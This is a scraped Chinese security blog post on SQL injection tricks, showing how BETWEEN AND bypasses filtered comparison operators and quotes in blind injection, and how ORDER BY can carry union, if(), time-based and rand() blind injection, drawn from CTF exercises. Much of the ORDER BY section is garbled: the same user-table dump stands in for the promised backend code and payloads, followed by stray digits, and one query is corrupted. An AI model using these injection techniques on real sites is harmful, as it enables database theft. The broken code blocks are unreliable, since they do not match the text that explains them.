SQL注入的两个小Trick与总结 – 安全客,安全资讯平台 | xxxSQL注入的两个小Trick与总结 – 安全客,安全资讯平台 – xxx
菜单






SQL注入的两个小Trick与总结 – 安全客,安全资讯平台

十月 31, 2018 - 安全客

SQL注入的两个小Trick与总结 - 安全客,安全资讯平台

最近发现了两个关于sql注入的小trick,分享一下.

 

between and 操作符代替比较符

操作符 BETWEEN … AND 会选取介于两个值之间的数据范围。这些值可以是数值、文本或者日期。
between and有数据比较功能

exp1 between min and max  如果exp1的结果处于min和max之间,`between and`就返回`1`,反之返回`0`.

示例

mysql> select * from user; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | |  3 | admin    | 26fff50e6f9c6ca38e181c65c1531eca | 456456664@qq.com | |  4 | add      | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+ mysql> select * from user where id between 1 and 2; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+

大多数数据库都支持between and操作,但是对于边界的处理有所不同,在mysql中,between and 是包含边界的,在数学中也就是[min,max]

 

在盲注中应用

between and可以用来在过滤了=,like, regexp,>,<的情况下使用.

mysql> select database(); +------------+ | database() | +------------+ | test       | +------------+ 1 row in set (0.00 sec)

1. 配合截取函数使用

mysql> select mid(database(),1,1) between 'a' and 'a' ; +-----------------------------------------+ | mid(database(),1,1) between 'a' and 'a' | +-----------------------------------------+ |                                       0 | +-----------------------------------------+ 1 row in set (0.00 sec)  mysql> select mid(database(),1,1) between 't' and 't' ; +-----------------------------------------+ | mid(database(),1,1) between 't' and 't' | +-----------------------------------------+ |                                       1 | +-----------------------------------------+ 1 row in set (0.00 sec)

2. 截取函数被过滤

表达式

select exp between min and max

在截取字符函数被过滤的时候,设置minmax的方式有所改变.

测试1

mysql> select 'b' between 'a' and 'c'; +-------------------------+ | 'b' between 'a' and 'c' | +-------------------------+ |                       1 | +-------------------------+ 1 row in set (0.00 sec)  mysql> select 'b' between 'a' and 'b'; +-------------------------+ | 'b' between 'a' and 'b' | +-------------------------+ |                       1 | +-------------------------+ 1 row in set (0.00 sec)  mysql> select 'b' between 'b' and 'c'; +-------------------------+ | 'b' between 'b' and 'c' | +-------------------------+ |                       1 | +-------------------------+ 1 row in set (0.00 sec)

测试2

mysql> select 'bcd' between 'a' and 'c'; +---------------------------+ | 'bcd' between 'a' and 'c' | +---------------------------+ |                         1 | +---------------------------+ 1 row in set (0.00 sec)  mysql> select 'bcd' between 'a' and 'b'; +---------------------------+ | 'bcd' between 'a' and 'b' | +---------------------------+ |                         0 | +---------------------------+ 1 row in set (0.00 sec)  mysql> select 'bcd' between 'b' and 'c'; +---------------------------+ | 'bcd' between 'b' and 'c' | +---------------------------+ |                         1 | +---------------------------+ 1 row in set (0.00 sec)

由测试可知,当exp为单个字符时三种区间返回值都是1,但是当exp为字符串时,当区间为a-b时,返回值为0.区间为a-c或者b-c时,返回值为1.

也就是在进行字符串比较时,只会包含一边的值,也就是[b,c).

所以在实际利用时,就要注意区间的范围.

实际测试

mysql> select database() between 'a' and 'z'; +--------------------------------+ | database() between 'a' and 'z' | +--------------------------------+ |                              1 | +--------------------------------+ 1 row in set (0.05 sec) ... mysql> select database() between 't' and 'z'; +--------------------------------+ | database() between 't' and 'z' | +--------------------------------+ |                              1 | +--------------------------------+ 1 row in set (0.00 sec)  mysql> select database() between 'u' and 'z'; +--------------------------------+ | database() between 'u' and 'z' | +--------------------------------+ |                              0 | +--------------------------------+ 1 row in set (0.00 sec)

由结果可知,第一个字符为t

第二个字符

mysql> select database() between 'tatest +----------------------------------+test | database() between 'ta' and 'tz' |test +----------------------------------+ |                                1 | +----------------------------------+ 1 row in set (0.00 sec)  mysql> select database() between 'te' and 'tz'; +----------------------------------+ | database() between 'te' and 'tz' | +----------------------------------+ |                                1 | +----------------------------------+ 1 row in set (0.00 sec)  mysql> select database() between 'tf' and 'tz'; +----------------------------------+ | database() between 'tf' and 'tz' | +----------------------------------+ |                                0 | +----------------------------------+ 1 row in set (0.00 sec)

剩下的以此类推.最终为test.

3. 单引号被过滤

between and还支持16进制,所以可以用16进制,来绕过单引号的过滤.

测试

mysql> select database() between 0x61 and 0x7a; //select database() between 'a' and 'z'; +----------------------------------+ | database() between 0x61 and 0x7a | +----------------------------------+ |                                1 | +----------------------------------+ 1 row in set (0.00 sec)  mysql> select database() between 0x74 and 0x7a; //select database() between 't' and 'z'; +----------------------------------+ | database() between 0x74 and 0x7a | +----------------------------------+ |                                1 | +----------------------------------+ 1 row in set (0.00 sec)  mysql> select database() between 0x75 and 0x7a; //select database() between 'u' and 'z'; +----------------------------------+ | database() between 0x75 and 0x7a | +----------------------------------+ |                                0 | +----------------------------------+ 1 row in set (0.00 sec)

 

了解order by

order by是mysql中对查询数据进行排序的方法,
使用示例

mysql> select * from user; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | |  3 | admin    | 26fff50e6f9c6ca38e181c65c1531eca | 456456664@qq.com | |  4 | add      | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+ mysql> select * from user where id between 1 and 2; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+

0

这里的重点在于order by后既可以填列名或者是一个数字。举个例子:
id是user表的第一列的列名,那么如果想根据id来排序,有两种写法:

mysql> select * from user; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | |  3 | admin    | 26fff50e6f9c6ca38e181c65c1531eca | 456456664@qq.com | |  4 | add      | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+ mysql> select * from user where id between 1 and 2; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+

1

 

order by盲注

结合union来盲注

这个是在安恒杯月赛上看到的。
后台关键代码

mysql> select * from user; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | |  3 | admin    | 26fff50e6f9c6ca38e181c65c1531eca | 456456664@qq.com | |  4 | add      | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+ mysql> select * from user where id between 1 and 2; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+

2

payload

mysql> select * from user; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | |  3 | admin    | 26fff50e6f9c6ca38e181c65c1531eca | 456456664@qq.com | |  4 | add      | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+ mysql> select * from user where id between 1 and 2; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+

3

sql语句就变为

mysql> select * from user; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | |  3 | admin    | 26fff50e6f9c6ca38e181c65c1531eca | 456456664@qq.com | |  4 | add      | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+ mysql> select * from user where id between 1 and 2; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+

4

这里就会对第三列进行比较,即将字符串和密码进行比较。然后就可以根据页面返回的不同情况进行盲注。
注意的是最好加上binary,因为order by比较的时候不区分大小写。

基于if()盲注

需要知道列名

order by的列不同,返回的页面当然也是不同的,所以就可以根据排序的列不同来盲注。

示例:

mysql> select * from user; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | |  3 | admin    | 26fff50e6f9c6ca38e181c65c1531eca | 456456664@qq.com | |  4 | add      | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+ mysql> select * from user where id between 1 and 2; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+

5

这里如果使用数字代替列名是不行的,因为if语句返回的是字符类型,不是整型。

不需要知道列名

payload

mysql> select * from user; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | |  3 | admin    | 26fff50e6f9c6ca38e181c65c1531eca | 456456664@qq.com | |  4 | add      | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+ mysql> select * from user where id between 1 and 2; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+

6

如果表达式为false时,sql语句会报ERROR 1242 (21000): Subquery returns more than 1 row的错误,导致查询内容为空,如果表达式为true是,则会返回正常的页面。

基于时间的盲注

payload

mysql> select * from user; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | |  3 | admin    | 26fff50e6f9c6ca38e181c65c1531eca | 456456664@qq.com | |  4 | add      | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+ mysql> select * from user where id between 1 and 2; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+

7

测试结果

mysql> select * from user; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | |  3 | admin    | 26fff50e6f9c6ca38e181c65c1531eca | 456456664@qq.com | |  4 | add      | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+ mysql> select * from user where id between 1 and 2; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+

8

测试的时候发现延迟的时间并不是sleep(1)中的1秒,而是大于1秒。
最后发现延迟的时间和所查询的数据的条数是成倍数关系的。
计算公式:

mysql> select * from user; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | |  3 | admin    | 26fff50e6f9c6ca38e181c65c1531eca | 456456664@qq.com | |  4 | add      | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+ mysql> select * from user where id between 1 and 2; +----+----------+----------------------------------+-------------------+ | id | username | password                         | email             | +----+----------+----------------------------------+-------------------+ |  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | |  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+

9

我所测试的ha表中有五条数据,所以延迟了5秒。如果查询的数据很多时,延迟的时间就会很长了。
在写脚本时,可以添加timeout这一参数来避免延迟时间过长这一情况。

基于rang()的盲注

原理不赘述了,直接看测试结果

mysql> select database(); +------------+ | database() | +------------+ | test       | +------------+ 1 row in set (0.00 sec)

0

可以看到当rang()为true和false时,排序结果是不同的,所以就可以使用rang()函数进行盲注了。

mysql> select database(); +------------+ | database() | +------------+ | test       | +------------+ 1 row in set (0.00 sec)

1

 

后记

order by注入在crf里其实出现挺多了,一直没有总结过.这次比较全的整理了一下(自认为比较全.XD),就和between and一起发出来了.欢迎师傅交流学习.








Notice: Undefined variable: canUpdate in /var/www/html/wordpress/wp-content/plugins/wp-autopost-pro/wp-autopost-function.php on line 51